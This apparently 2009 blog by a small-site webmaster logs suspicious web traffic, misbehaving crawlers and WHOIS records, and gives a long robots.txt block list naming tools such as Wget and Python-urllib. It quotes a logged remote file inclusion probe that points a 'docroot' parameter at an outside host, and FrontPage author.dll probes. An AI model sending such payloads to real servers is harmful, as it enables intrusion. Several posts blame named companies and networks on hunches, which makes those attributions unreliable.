Monday, June 29, 2009

Embarq Corporation - Malformed web requests

We are getting malformed web requests from this IP address on the Embarq Corporation network:

67.237.204.65

In fact we have seen a lot of bad traffic from Embarq network address ranges in the past.

OrgName: Embarq Corporation
OrgID: EMBAR
Address: 500 N New York Ave
City: Winter Park
StateProv: FL
PostalCode: 32789
Country: US

NetRange: 67.232.0.0 - 67.239.255.255

Friday, June 26, 2009

XLHost - Trying to access our sites progammatically

XLHost IP ranges continue to try to access our sites programmatically:

eNET Inc. ENET-XLHOST-2 (NET-173-45-64-0-1)
173.45.64.0 - 173.45.127.255
XLHost.com Inc XLHOST-DTODD1-5959 (NET-173-45-70-176-1)
173.45.70.176 - 173.45.70.183

Bad requests - Verizon

Got over 1200 bad requests from this IP on the Verizon network today: 71.176.87.58

OrgName: Verizon Internet Services Inc.
OrgID: VRIS
Address: 1880 Campus Commons Dr
City: Reston
StateProv: VA
PostalCode: 20191
Country: US

NetRange: 71.173.96.0 - 71.180.255.255
CIDR: 71.173.96.0/19, 71.173.128.0/17, 71.174.0.0/15, 71.176.0.0/14, 71.180.0.0/16
NetName: VIS-BLOCK
NetHandle: NET-71-173-96-0-1
Parent: NET-71-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.BELLATLANTIC.NET
NameServer: NS2.BELLATLANTIC.NET
NameServer: NS2.VERIZON.NET
NameServer: NS4.VERIZON.NET

Strange requests / odd headers

We're getting strange requests on our server for files we don't host like this:

ip: 69.72.169.233

query string: path[docroot]=http://barrasford.net/barras/1.swf??

Fri Jun 26 15:39:20 PDT 2009

User Agent: Mozilla/5.0

Headers:

TE: deflate,gzip;q=0.3

Connection: TE, close

Thursday, June 25, 2009

author.dll

A bot called core-project is coming from different URLs and attempting to access something called author.dll on our server:


6/19/2009 11:03:08 PM 125.244.77.2 /_vti_bin/_vti_aut/author.dll core-project/1.0 POST
6/18/2009 3:14:16 PM 62.212.123.125 /_vti_bin/_vti_aut/author.dll core-project/1.0

Wednesday, June 24, 2009

Alaska Communications Group

Based on recent activity on my server, I have a hunch there are hackers coming out of this network but couldn't prove it at the moment. Will have to keep an eye on this...

OrgName: Alaska Communications Systems Group, Inc.
OrgID: ACSG-1
Address: c/o ACS Internet, Inc.
Address: 600 Telephone Ave.
City: Anchorage
StateProv: AK
PostalCode: 99503
Country: US

ReferralServer: rwhois://rwhois.acsalaska.net:4321

NetRange: 216.67.0.0 - 216.67.127.255

Tuesday, June 23, 2009

Turnitin Bot - Odd behavior

Turnitin bot is requesting pages and types of technology that hasn't existed on one of your sites for years - probably over five years.

First question is - where are they even getting these links?

Second question is - why are they not obeying robots.txt for this site?

Turnitin bot is on this network:

O1.com NETBLK-O1-BLK4 (NET-65-98-128-0-1)
65.98.128.0 - 65.98.255.255
iParadigms, LLC NETBLK-65-98-224-0 (NET-65-98-224-0-1)
65.98.224.0 - 65.98.224.31

SuperPages Bot - Bogus Requests?

The SuperPages bot is submitting web requests that don't appear to be true. I'm not even sure if this bot is really from super pages. It lists a particular web page as the referrer, but after visiting that web page, there are clearly no links to our sites on that page. Obviously the bot is making up bogus information that could skew marketing results. I hope people are also not paying for bogus clicks from this company as a result of this activity.

The IP address from which the bogus web request came: 151.138.13.244

Suspicious Login Activity

I just logged into my web server. First connect to VPN, then type in admin password.

I typed in the administrate password numerous times. I know it was exactly the right password. I must have typed it 10 or 20 times. I even typed it out in notepad so I could see what I was typing to verify I was typing the right thing.

About the 20th attempt - suddenly the password worked. This is the same password I typed each time over and over again very carefully after it failed the first few times.

Something very strange is going on...time to change passwords.

Friday, June 19, 2009

AT&T Wireless - Reports people in Florida when Not

AT&T Wireless reports people as logging in from Florida using their laptop connect cards when they are at the opposite side of the country. You'd think with all the work on with GPS and the government mandate regarding pinpointing people's locations when they are on cell phones for 911 calls that they would also accurately pinpoint locations when using laptop connect cards.

This is the network you get when you look up the associated IP addresses:

OrgName: AT&T Global Network Services, LLC
OrgID: ATGS
Address: 3200 Lake Emma Road
City: Lake Mary
StateProv: FL
PostalCode: 32746
Country: US

NetRange: 32.0.0.0 - 32.255.255.255

Perhaps this is for security reasons or otherwise, I'm not sure, but if they are serving up an IP in LA or Seattle it seems like they could pull it from an associated IP range mapped to that city so locations can be accurately reported in logs.

This is like AOLs IP address reporting which basically does the same thing. Everyone is in Virginia according to their IP ranges.

Thursday, June 18, 2009

Mail.Ru/1.0 not obeying Robots.txt

This bot Mail.Ru/1.0 read robots.txt, ignored it and tried to access a page anyway from this IP address 94.100.181.242

Wednesday, June 17, 2009

GoogleImageBot

We have a site where we disallow the Google image bot. We started putting the photos on a sub-domain of that web site. Google-bot apparently scanned and put all the images on that sub-domain on the net even though our robots.txt file for that site tells Google to bug off and there's no link to those images except from our site.

Tuesday, June 16, 2009

Comodo - unwanted traffic

There is some obvious web request manipulation going on from this network which hosts the "comodo SSL checker" bot:

inetnum: 91.209.196.0 - 91.209.196.255
netname: COMODO
descr: Comodo CA Ltd
country: GB

FollowSite Bot

FollowSite Bot ( http://www.followsite.com/bot.html ) is not obeying robots.txt on our server.

AOL Hacker

Getting bombed with abusive traffic repeatedly by someone on AOL. We've reported this malicious traffic to AOL a number of times and still it continues. We've finally just had to completely block the IPs in this range:

205.188.116.0-205.188.117.255

Websense

After asking Websense to please stop hitting our web sites with clearly altered or bogus traffic - they proceeded to hit all our web sites repeatedly with such traffic. This is not very nice behavior. They could have emailed me back to explain what they are doing and why instead of trying to continue to bomb our web sites.

Websense does security research which I appreciate, however I do not appreciate the bogus traffic they are sending to our web sites constantly. A check once in a while would be fine but they hit the sites repeatedly every day. This seems a bit excessive.

Seriously we have a handful of local sites. Do they need to hit them three times a day??

Websense (WEBSEN-1)
Websense Network Operations Center (WNOC-ARIN) arin@websense.com +1-858-320-8000
Websense, Inc (AS13448) WEBSENSE 13448
Websense TWTC-NETBLK-4 (NET-66-194-6-0-1) 66.194.6.0 - 66.194.6.255
Websense Inc12036038 SBC06711720112828040601125225 (NET-67-117-201-128-1) 67.117.201.128 - 67.117.201.143

Bad request - Pocketinet

Our web servers just went down for some reason. Right before the problem we got a bad web request from this ip address and network ...and additionally they attempted to access the site using Wget.

64.185.119.190

Pocketinet Communications, Inc POCKETINET-1 (NET-64-185-96-0-1)
64.185.96.0 - 64.185.127.255
PocketInet POCKETINET-BG-2 (NET-64-185-119-128-1)
64.185.119.128 - 64.185.119.255

Yeah OK we could be more scalable - but it's just some little local web sites.

Monday, June 15, 2009

Strange traffic - related?

Getting some weird web requests right now and wondering if traffic from these IPs are somehow related:

209.112.190.24

OrgName: Alaska Communications Systems Group, Inc.
OrgID: ACSG-1
Address: c/o ACS Internet, Inc.
Address: 600 Telephone Ave.
City: Anchorage
StateProv: AK
PostalCode: 99503
Country: US

72.192.71.233
Cox Communications Inc. NETBLK-COX-ATLANTA-11 (NET-72-192-0-0-1)
72.192.0.0 - 72.223.255.255
Cox Communications NETBLK-OK-RDC-72-192-64-0 (NET-72-192-64-0-1)
72.192.64.0 - 72.192.127.255


69.50.139.225
NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1)
69.50.128.0 - 69.50.143.255
WTS MACH10-WTS (NET-69-50-139-128-1)
69.50.139.128 - 69.50.139.255

170.35.224.64
OrgName: BellSouth Cellular Corp.
OrgID: BCC-12
Address: 12555 Cingular Way
Address: Suite 4360
City: Alpharetta
StateProv: GA
PostalCode: 30041
Country: US

NetRange: 170.35.0.0 - 170.35.255.255

SuperPages bot traffic

Why is the SuperPages bot

a.) not obeying robots.txt
b.) getting referred from this web site: http://www.clearwatergazette.com
c.) hitting a site that we are not running super pages ads on...

The traffic is coming from:

OrgName: Idearc Media Corp
OrgID: IMC-97
Address: 2200 W Airfield Drive
City: DFW Airport
StateProv: TX
PostalCode: 75261
Country: US

NetRange: 151.138.0.0 - 151.138.255.255

Thursday, June 11, 2009

MSR-ISRCCrawler not obeying robots.txt

Strangely, MSR-ISRCCrawler checked robots.txt. It clearly says in our robots.txt file that this bot is disallowed. Then it proceeded to crawl our site anyway. Hmm...

Cogentco - bad traffic again.

38.100.41.112

Cogentco is at it again. Actually now when you look up this IP address it doesn't say Cogentco anymore it says PSINet but same thing. They are hitting our sites with clearly garbage traffic. We've blocked them out and show a blatant error message but traffic persists.

It's pretty clear that the traffic in question is both automated and not valid as this particular IP: 38.100.41.112 has just hit all the pages in a site selling.

In June.

Cogentco / PSINet traffic is bad news. You may want to watch and potentially block it on your server.

OrgName: PSINet, Inc.
OrgID: PSI
Address: 1015 31st St NW
City: Washington
StateProv: DC
PostalCode: 20007
Country: US
NetRange: 38.0.0.0 - 38.255.255.255

Today's Robot.txt file

If you're trying to prevent most automated traffic except major search engines on a particular web site heres a robots.txt file. Note that not all these are actually bots and some things like Python, Perl and Java agents running around the Internet and used by hackers don't obey or even check robots.txt so you'll have to use other ways to monitor and handle this traffic on your web site.


User-Agent: FollowSiteBot
Disallow: /

User-Agent: nambu
Disallow: /

User-Agent: uberbot
Disallow: /

User-Agent: KaloogaBot
Disallow: /

User-Agent: Yeti
Disallow: /

User-Agent: Servage
Disallow: /

User-Agent: ServageRobot
Disallow: /

User-Agent: Trident
Disallow: /

User-Agent: uw_cse_xwc
Disallow: /

User-Agent: ZupeeCrawler
Disallow: /

User-Agent: Webspider
Disallow: /

User-Agent: LinkAider
Disallow: /

User-Agent: Axonize-bot
Disallow: /

User-Agent: ips-agent
Disallow: /

User-Agent: RiceComputerArchitecture
Disallow: /

User-Agent: AISearchBot
Disallow: /

User-Agent: flatlandbot
Disallow: /

User-Agent: FairShare
Disallow: /

User-Agent: SapphireWebCrawler
Disallow: /

User-Agent: LocalBot
Disallow: /

User-Agent: LaBot
Disallow: /

User-Agent: Butterfly
Disallow: /

User-Agent: robotgenius
Disallow: /

User-Agent: WillyBot
Disallow: /

User-Agent: GingerCrawler
Disallow: /

User-Agent:larbin
Disallow: /

User-Agent: ru_com_viewer
Disallow: /

User-Agent:Yandex
Disallow: /

User-Agent:yandex
Disallow: /

User-Agent:msnbot-media
Disallow: /

Sitemap: http://www.rainierrhododendrons.com/sitemap.xml

User-Agent:del.icio.us
Disallow: /

User-Agent:Sika
Disallow: /

User-Agent:whois.de
Disallow: /

User-Agent:Isidorus
Disallow: /

User-Agent:Yanga
Disallow: /

User-Agent:MSR-ISRCCrawler
Disallow: /

User-Agent:Snappybot
Disallow: /

User-Agent:Gaisbot
Disallow: /

User-Agent:SapphireWebCrawler
Disallow: /

User-Agent:BobCrawl
Disallow: /

User-Agent:OpenX
Disallow: /

User-Agent:Axonize-bot
Disallow: /

User-Agent:KaloogaBot
Disallow: /

User-Agent:kalooga
Disallow: /

User-Agent:OnTownsBot
Disallow: /

User-Agent:Cazoodle-Bot
Disallow: /

User-Agent: REAP-Crawler
Disallow: /

User-Agent: DotBot
Disallow: /

User-Agent: Gigabot
Disallow: /

User-Agent: NetcraftSurveyAgent
Disallow: /

User-Agent: SurveyBot
Disallow: /

User-Agent: DBLBot
Disallow: /

User-Agent: AISearchBot
Disallow: /

User-Agent: Charlotte
Disallow: /

User-agent: IntegraTelecom
Disallow: /

User-agent: PSIBots
Disallow: /

User-agent:Websense
Disallow: /

User-agent:HornySexSearch
Disallow: /

User-agent: SnapPreviewBot
Disallow: /

User-agent: Snoopy
Disallow: /

User-agent: libwww-perl
Disallow: /

User-agent: nexen
Disallow: /

User-agent: phpversion
Disallow: /

User-agent: attributor
Disallow: /

User-agent: Java
Disallow: /

User-agent: bsalsa
Disallow: /

User-agent: whoisde.de
Disallow: /

User-agent: envolk
Disallow: /

User-agent: QEAVis
Disallow: /

User-agent: NextGenSearchBot
Disallow: /

User-agent: boitho.com
Disallow: /

User-agent: boitho
Disallow: /

User-agent: Wget
Disallow: /

User-agent: Rankivabot
Disallow: /

User-agent: T-Online Browser
Disallow: /

User-agent: webalta
Disallow: /

User-agent: page_prefetcher
Disallow: /

User-agent: cyberpatrol
Disallow: /

User-agent: sitecat
Disallow: /

User-agent: cyberpatrolcrawler
Disallow: /

User-agent: internetseer
Disallow: /

User-agent: searchme
Disallow: /

User-agent: dcbot
Disallow: /

User-agent: scoutjet
Disallow: /

User-agent: sphsearch
Disallow: /

User-agent: exabot
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: naverbot
Disallow: /

User-agent: twiceler
Disallow: /

User-agent: zermelo
Disallow: /

User-agent: Moozilla
Disallow: /

User-agent: kyluka
Disallow: /

User-agent: scoutjet
Disallow: /

User-agent: baiduspider
Disallow: /

User-agent: MLBot
Disallow: /

User-agent: worio
Disallow: /

User-agent: turnitinbot
Disallow: /

User-agent: exooba
Disallow: /

User-agent: ViolaBot
Disallow: /

User-agent: speedyspider
Disallow: /

User-agent: becomebot
Disallow: /

# disallow Googlebot-Image
User-agent: Googlebot-Image
Disallow: /

User-agent: MJ12bot
Disallow: /

User-agent: QEAVis
Disallow: /

User-agent: VWBot
Disallow: /

User-agent: ShopWiki
Disallow: /

User-agent: SnapPreviewBot
Disallow: /

User-agent: panscient.com
Disallow: /

User-agent: panscient
Disallow: /
User-agent: sproose
Disallow: /

User-agent: voyager
Disallow: /

User-agent: grub
Disallow: /

User-agent: libwww-perl
Disallow: /

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: Twiceler
Disallow: /

User-agent: WebDataCentreBot
Disallow: /

User-agent: OOZBOT
Disallow: /

User-agent: setooz
Disallow: /

User-agent: bsalsa
Disallow: /

User-agent: perl
Disallow: /

User-agent: botmobi
Disallow: /

User-agent: NextGenSearchBot
Disallow: /

User-agent: ASPSimply
Disallow: /

User-agent: Python-urllib
Disallow: /

User-agent: Moozilla
Disallow: /

User-agent: voilabot
Disallow: /

User-agent: WGet
Disallow: /

User-agent: obot
Disallow: /

User-agent: Java
Disallow: /

User-agent: libcurl-agent
Disallow: /

User-agent: phpversion
Disallow: /

User-agent: therarestparser
Disallow: /

User-agent: Jakarta Commons-HttpClient
Disallow: /

FollowSiteBot

The FollowSiteBot...

Not checking robots.txt like a good little bot...

FollowSiteBot came from this network today: 74.86.223.42

SoftLayer Technologies Inc. SOFTLAYER-4-4 (NET-74-86-0-0-1)
74.86.0.0 - 74.86.255.255
ASX Networks ApS NET-74-86-223-40 (NET-74-86-223-40-1)
74.86.223.40 - 74.86.223.47

uberbot - misbehaving

uberbot is not obeying robots.txt

Today's Bot Traffic - a lot of Twitter Referrals

We got hit with a lot of bots today. It seems that a great deal of this may be caused by Twitter posts.

14 174.129.124.97 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
13 67.202.8.12 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
12 75.101.139.240 Python-urllib/1.17 GET 6 2009 10
11 174.129.123.212 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
8 216.24.131.119 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Me.dium/1.0 (http://me.dium.com) GET 6 2009 10
8 216.24.131.119 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Me.dium/1.0 (http://me.dium.com) HEAD 6 2009 10
6 64.73.66.94 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618) GET 6 2009 10
6 195.210.57.83 Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler) GET 6 2009 10
6 130.76.32.16 Mozilla/4.0 (compatible;) GET 6 2009 10
5 216.100.200.126 Mozilla/4.0 (compatible;) GET 6 2009 10
3 130.76.32.181 Mozilla/4.0 (compatible;) GET 6 2009 10
3 174.129.168.229 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
2 174.129.118.37 Python-urllib/2.5 GET 6 2009 10
2 208.74.66.43 libwww-perl/5.825 GET 6 2009 10
2 174.129.89.199 Python-urllib/2.5 GET 6 2009 10
2 67.220.192.206 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729) GET 6 2009 10
2 67.112.74.47 Mozilla/4.0 (compatible;) GET 6 2009 10
1 67.202.58.81 rdfbot/1.0 (rdfbotsupport AT rediffmailpro DOT com) GET 6 2009 10
1 69.58.178.33 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7 GET 6 2009 10
1 67.23.27.247 Nambu URL Destination Determinator +bot http://nambu.com GET 6 2009 10
1 67.23.27.250 Nambu URL Destination Determinator +bot http://nambu.com GET 6 2009 10
1 75.101.178.247 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
1 174.129.224.58 PycURL/7.19.0 GET 6 2009 10
1 174.129.104.29 Python-urllib/2.5 GET 6 2009 10
1 174.129.223.229 uberbot 1.0 HEAD 6 2009 10

Wednesday, June 10, 2009

Twitturly - bad bot on Amazon network

Whatever Twitturly is it is not obeying robots.txt. It came from the Amazon network at this IP address: 174.129.88.144

Additionally it came in conjunction with a number of other bots that hit this particular site at the same time. I assume it was because the web site owner posted her site somewhere that is being monitored by bots. Unfortunately the bots seem to be misbehaving.

LocalBot not checking Robots.txt

Something coming from this IP: 121.138.194.106 called LocalBot is not checking robots.txt files. Annoying.

Tons of hits from 204.16.231.98 - Sparkplug, Inc.

Not sure why but our web sites are getting what seems to be an excessive number of hits from the Sparplug, Inc. network in Chicago.

The particular IP address doing the traffic generation is: 204.16.231.98

OrgName: Sparkplug, Inc.
OrgID: SPARK-3
Address: 303 W. Erie
Address: Suite 300
City: Chicago
StateProv: IL
PostalCode: 60610
Country: US
NetRange: 204.16.228.0 - 204.16.231.255

The traffic hitting our server seems to be focused on a particular web site that servers local customers for the particular business - who are not in Chicago.

Maybe this is just someone admiring the work on our web sites, I am not sure...seems a little odd however.

Tuesday, June 09, 2009

VeriSign - unwanted traffic

Why is Verisign hitting our sites repeatedly with unwanted traffic?

This IP address: 69.58.178.33 was hitting our a site repeatedly from 6/8/2009 8:19:33 PM to 6/8/2009 8:19:57 PM.

So what? The site is advertising the sale of Christmas wreaths and this is JUNE. It's the middle of the summer and obviously no one at Verisign is interested in buying Christmas wreaths.

The IP or computer/server at Verisign scanned this site and hit 25 different pages. Obviously this is not someone reviewing the site to buy something and obviously there is some automated software on this server at Verisign doing something on our servers - who know for what or why. It definitely was not for any service requested by us.

Here's the Verisign network in question:

OrgName: VeriSign Infrastructure & Operations
OrgID: VIO-2
Address: 21345 Ridgetop Circle
City: Dulles
StateProv: VA
PostalCode: 20166
Country: US
NetRange: 69.58.176.0 - 69.58.191.255

Norton - Update Not Working?

I set up Norton Anti-Virus on a new machine recently and when I did, I noticed that it looked different than the version of Norton running on my other machine. I installed Norton on this other machine probably close to a year ago but I have updated it regularly since then.

So is the problem that Norton Antivirus is not actually updating or if you have an old version they just leave parts of it in tact so it doesn't look completely like the new version?

With this and my last post about Adobe Acrobat - seems like you may want to frequently uninstall and reinstall certain software that may have been affected by malware or viruses.

Perhaps vendors also need a better way for vendors to verify their update process is working.

Adobe Acrobat Reader - Update Not Working?

I typically update all my software fairly regularly. I noticed a while ago that I have an old version of Adobe Acrobat Reader even after doing the updates many times. I finally I decided to uninstall Adobe Acrobat Reader 8.something so I could install the latest version.

I was reminded that I need to do this when I went to the Secunia web site and saw the latest Adobe Acrobat Reader advisory - which unfortunately includes version 9:

Adobe Acrobat Reader - Memory Corruption Vulnerability

This particular vulnerability above is only confirmed for Linux but chances are it occurs on other operating systems as well.

Additionally recently someone I know was using Adobe and some rogue JavaScript code caused him some problems on one of his machines - which is how I got into look at the whole Adobe Acrobat Reader update problem in the first place.

Interestingly enough, after uninstalling Adobe Acrobat Reader version 8, I try to go to the Adobe web site and when I click the link to install the most recent version of Adobe I got an error saying my IP was blocked. Ok so I'll just jump on a different network. That IP was blocked too. Ok that's odd. I went to a completely different machine and was able to click the download link. So I came back to document all of this in my blog - and suddenly now I can download again.

One thing I don't like about Adobe's web site is that the download is in HTTP, not HTTPS. How do we know files and bits and bytes aren't getting altered in transit?

Monday, June 08, 2009

Rundll.exe and task manager

When I pulled up task manager a process - I think using rundll.exe was running and disappeared shortly after opening the task manager. I have noticed a lot of times when I open the task manager whatever was hung up on my computer suddenly starts working. This leads me to wonder if some malware is designed to automatically shut off if the task manager is opened as users are getting hip to the fact that extraneous processes running could mean trouble...

Would be nice to have a button in task manager to easily get to some log of what was recently running on your computer as well as what is currently running.

Thursday, June 04, 2009

Malware - DigExt?

Had a user cross our site today that hit our site with numerous bad URLs obviously looking for some type of hack.

Time/Date: 6/4/2009 9:04:23 PM
The user agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)
IP Address: 204.16.231.98

They came from this network:

OrgName: Sparkplug, Inc.
OrgID: SPARK-3
Address: 303 W. Erie
Address: Suite 300
City: Chicago
StateProv: IL
PostalCode: 60610
Country: US

ReferralServer: rwhois://rwhois.sparkplugbb.net:4321/

NetRange: 204.16.228.0 - 204.16.231.255

Hotstocked.com - RateItAll

[NOTE: HotStocked.com as it was seems to have gone away - probably due to all the complaints about malicious and inaccurate information. It now is a completely different site.]

Had problems with web sites posting incorrect or harmful information about you and having a problem getting it removed?

You can post your comments about these web sites at RateItAll.com

For instance someone I know is having problems getting their name removed from HotStocked.com which has posted a lot of incorrect information about people and refuses to remove it upon request.

Add your comments about HotStocked.com:
http://www.rateitall.com/i-995297-hotstockedcom.aspx

For an example of the type of posts you'll find on Hotstocked.com which are derogatory and probably personal attacks and altercations rather than useful information, search the site for negative postings about people and requests for removal that have not been granted. I'm sure you'll quickly find what that Hotstocked.com is full of spammy, personal content and most likely fabricated information about people posted by those who dislike them for whatever reason.

Wednesday, June 03, 2009

Moozilla

We get repeated hits from a user agent called Moozilla. The hits will come from a bunch of different IP addresses on the Netscape/AOL network in succession. Sample hits:

6/1/2009 17:46 207.200.116.73 Moozilla
6/1/2009 17:46 207.200.116.131 Moozilla
6/1/2009 17:46 207.200.116.135 Moozilla
6/1/2009 17:46 207.200.116.136 Moozilla
6/1/2009 17:46 207.200.116.5 Moozilla
6/1/2009 17:46 207.200.116.12 Moozilla
6/1/2009 17:46 207.200.116.135 Moozilla
6/1/2009 17:46 207.200.116.136 Moozilla
6/1/2009 17:46 207.200.116.5 Moozilla
6/1/2009 17:46 207.200.116.12 Moozilla
6/1/2009 17:46 207.200.116.67 Moozilla
6/1/2009 17:46 207.200.116.6 Moozilla
6/1/2009 17:46 207.200.116.65 Moozilla

We have sent specific messaging back to this bot or software and contacted AOL about the problem but the particular traffic continues. When this particular software hits, it generates hundreds of hits on our web site in succession and does not behave like a normal web user.

The network reported generating this traffic is Netscape (now owned by AOL).

OrgName: Netscape Communications Corp.
OrgID: NSCP
Address: 501 E. Middlefield
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

NetRange: 207.200.64.0 - 207.200.127.255

SurveyBot - Compass Communications

The SurveyBot from Whois.sc hosted at Compass Communications, apparently located at the Westin Building in Seattle is not obeying our robots.txt files.

OrgName: Compass Communications, Inc.
OrgID: CPCM
Address: 2001 6th Avenue
Address: Suite 3205
City: Seattle
StateProv: WA
PostalCode: 98121
Country: US

NetRange: 216.145.0.0 - 216.145.31.255

Some others have been asking about this particular bot on forums:

Compass Communications

I do not particularly appreciate the fact that they scrape web content during their visits.

Tuesday, June 02, 2009

Another Google Bot Impostor

Just got hit by another Google bot impostor:

216.240.151.50
6/2/2009 4:20:59 PM
Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)


OrgName: ATMLINK, INC.
OrgID: ATMLIN
Address: 600 W. 7th Street
Address: Suite 360
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US

NetRange: 216.240.128.0 - 216.240.159.255

AT&T Wireless Doesn't Report Accurate Location

Interesting - Using AT&T Wireless card in Seattle reports an IP address that makes it look like I'm in Florida.

OrgName: AT&T Global Network Services, LLC
OrgID: ATGS
Address: 3200 Lake Emma Road
City: Lake Mary
StateProv: FL
PostalCode: 32746
Country: US

NetRange: 32.0.0.0 - 32.255.255.255